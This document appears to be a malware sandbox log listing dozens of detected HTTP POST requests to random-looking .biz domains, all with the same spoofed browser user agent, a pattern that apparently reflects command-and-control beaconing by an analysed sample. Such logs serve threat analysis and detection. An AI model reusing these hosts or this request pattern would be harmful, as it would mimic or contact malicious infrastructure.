Source: global traffic	HTTP traffic detected: POST /tpnlrogxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gqjcfeax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fxyeanegauuypg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /itmauuakdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cqrtypmijgihv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xcccv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /seopbnrlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lqskha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /poufjqlcmnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fwiohktfcqxxnbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pdgkdbbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /byhbnbikqcomemw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xcnnbrtqgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qoerrcmhybkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wnele HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrxwrhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xwfedwcvhvxkiha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mfixqgnsqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /frqpsrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hljxfepxgpjush HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fiarjsoopiyhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vwjckymhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dpjyudy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hdokbthlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xllckl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nfbd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ldxvcwjydqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qlyttg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbpibulhoasascdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /aatcckarfifoo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nempu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /agwyffystye HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mgvdqejexijygsb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cwhybsvpmfyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wiwimspu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rwiyegsmnxbaierb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yrhkaiacfhbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lvawmhxu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hkamlwlybbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fokcciedcqjopse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yxknqhe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bvfgvukbuqpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mtdievukjebc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gpyvldlckbfoes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /buaqnbkgjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ehwru HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lvdayepitqcdyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lvojr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wkwfipyoltumu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fxrfgipsrdogf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jagvrjcebgwmee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
